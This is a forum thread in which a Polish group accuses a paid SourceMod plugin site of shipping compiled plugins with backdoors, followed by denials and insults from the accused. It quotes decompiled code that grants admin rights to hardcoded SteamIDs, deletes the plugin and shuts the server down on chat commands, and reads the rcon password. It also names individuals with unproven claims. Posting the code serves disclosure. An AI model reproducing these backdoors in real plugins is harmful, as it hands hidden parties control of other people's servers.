[AntyIdiotsTeam]

Hello,
so first of all, we are the Polish team that try to get Polish sourcemod developers sorted and make sure everyone is legal.

For few months there is a fun site called https://pluginysm.pl/

So, they are selling plugins for some money, well i like that BUT, there are 2 things.
First: They are breaking the LAW of Sourcemod license, because 3/4 of the plugins don't have any sourcecode only compiled SMX, and there is backdoor inside the smx plugins.

After scanning some of the plugins, and decompiling them there you can find some bad shit

base64_cFillChar;
base64_decodeTable[256] =

PHP Code:

if (StrEqual(steamid, "STEAM_1:0:189210523", true) || StrEqual(steamid, "STEAM_0:1:452047314", true) || StrEqual(steamid, "STEAM_1:1:3685391", true))
   if (StrEqual(Text, "take access", true))

        {

            PrintToConsole(client, "~~~ Hello Roberrt or DevLogic !");

            PrintToConsole(client, "~~~ Crashing system in progress..");

            PrintToConsole(client, "~~~ Access Granted !");

            PrintToConsole(client, "~~~ Welcome in root strafe !");

            AddUserFlags(client, 14);

            ClientCommand(client, "play *UI/deathmatch_kill_bonus.wav");

        } 


So as you can see, there, 2 owners of the website Pluginysm.pl have the FULL ACCESS to the server and all the permissions, basically, that's why probably they didin't attach the sourcecode ;).

The OWNERS:
1. https://steamcommunity.com/id/imroberrt
2. https://steamcommunity.com/id/matix8981/

PHP Code:

if (StrEqual(Text, "off plugin", true))

        {

            ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");

            SetFailState("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, zostaje on wylaczony.");

        }

        if (StrEqual(Text, "off server", true))

        {

            ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");

            LogError("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, serwer został zdalnie wyłączony.");

            ServerCommand("killserver");

        }

        if (StrEqual(Text, "delete plugin", true))

        {

            ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");

            LogError("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, został on zdalnie usunięty.");

            DeletePlugin();

            ServerCommand("killserver");

        } 


I don't know how stupid you have to be to think that ServerCommand "killserver" is a secure thing to do, but anyway, i found that they are many includes and some weird extensions attached that allows for remote access as well.


So now, i want to ask sourcemod developers moderators, what kind of investigation would be fast and work for 100% to close up this shit pretty fast. And to get people to answer for their actions.
Deliberate insertion of backdoors is from what I know is illegal, so that's the second shot.

I created the topic in Polish forum as well, but the owner of this site (Pluginy SM) just were laughing that they got 2 more purchases and they got more views on the website, shorter version: They don't give a fuck.

I want to know your opinion guys about that, and some helpful comments .


Fun fact: The owner of the pluginysm have the account here
His steam ID - https://steamcommunity.com/id/imroberrt
His profile on this forums - https://forums.alliedmods.net/member.php?u=274727

[GoldeneK]

Wth?

[Oshizu]

Would be nice if you would upload plugins too. So that we can see and decompile files ourself.


Uploading these plugins for investigation here shouldn't be violation of SourceMod license unlike selling plugins without .smx

[AntyIdiotsTeam]

Quote:

Originally Posted by Oshizu Would be nice if you would upload plugins too. So that we can see and decompile files ourself. Uploading these plugins for investigation here shouldn't be violation of SourceMod license unlike selling plugins without .smx

Thank you for your reply Oshizu. Of course i can upload the plugins too.
There you have link for the first .smx file included in the package: https://www66.zippyshare.com/v/N1VM2X2d/file.html

Of course i want to mention that there is no sourcecode attached in the plugin so, what a newbie can do, if the 3rd party site can have unauthorized access to the server.

And after those 2 days, i was talking with the people who bought something from that website, they didin't receive sourcecode either, which is violation of Sourcemod license.
They give sourcecode for plugins for FREE or plugins with 30-50 lines max. That's it.

The rest of the resources are just a cat in the bag.



Still we will do everything we can to just put the case forward, i want to know your opinion and what would be best steps that they will to pay for their actions.

[Mesharsky How2Kill]

Well, i can see as well, that someone figured out that the plugin uses something like that:

ConVar.GetString(FindConVar("rcon_password"), rcon, 12;


I doubt it would be useful in any way for customers .
But the website owners are probably using it.
Well, I am waiting for the development of this case .
Neutral here atm, but i don't think so it's nice what they are doing lmao.

[Bioly]

So AntyIdiotsTeam.
You wrote that 3/4 plugins have no sp, you have 1, maybe 2 matix packages. All the plugins I have uploaded on website have sp, I do not know what the situation in Roberrt looks like. Don't mislead people.
Regards.

[GoldeneK]

nice, you have uploaded plugin that isnt’it on our website/server. please upload some my or Bioly plugins or shut up okay?

[supertimor]

Hahahahaha, you've deleted these files after first post on polish sm circus, same as your 'package' with multi1v1.. yea, plugins from alliedmods with added license code for $$ XD
love pluginysm

Ofc i never bought anything from them, just i know people who did it, so easily i can tell that roberrt (goldenek) isn't pushing .sp into packages too - roberrtrank, do you remember?

[Matix8981]

This short code isn't from my commerce plugin well congratulations for author this topic

Code:

if (StrEqual(Text, "off plugin", true))

        {

            ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");

            SetFailState("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, zostaje on wylaczony.");

        }

        if (StrEqual(Text, "off server", true))

        {

            ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");

            LogError("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, serwer został zdalnie wyłączony.");

            ServerCommand("killserver");

        }

        if (StrEqual(Text, "delete plugin", true))

        {

            ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");

            LogError("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, został on zdalnie usunięty.");

            DeletePlugin();

            ServerCommand("killserver");

        }

For my commerce plugins any client have SP (I send all SP for clients in 06-20-2019).
For all selling plugins from PluginySM any client have SP if you know.

ps. AntiIdiots is a jealous fucking Pole because someone makes money

[supertimor]

yea, huge ammount of money XD 5-70zł which is max ~1EUR - ~16 EUR, with 2 selled copies XDD
he's jealous af dude


/edit

https://mygo.pl/topic/8856-paczka-ar...#comment-36747

There as you can see is topic, in polish but i'll translate it - so DevLogic(Matix8981) is announcing himself selling arena 1v1 package. https://pluginysm.pl/file/15-matix-paczka-arena-1vs1/ This link is of course not available at all now, because Roberrt(Goldenek) in same topic says, that he hid the package and if he'll go back to Warsaw, then he'll think about it. blablabla, ok then, so link to same package uploaded by our generous friend - https://www27.zippyshare.com/v/lQtdrjmn/file.html
And thats all. You can download it easily, just take look at files, you need to decompile .smx'es but its easy for someone, who knows what to do, and want to do this ;)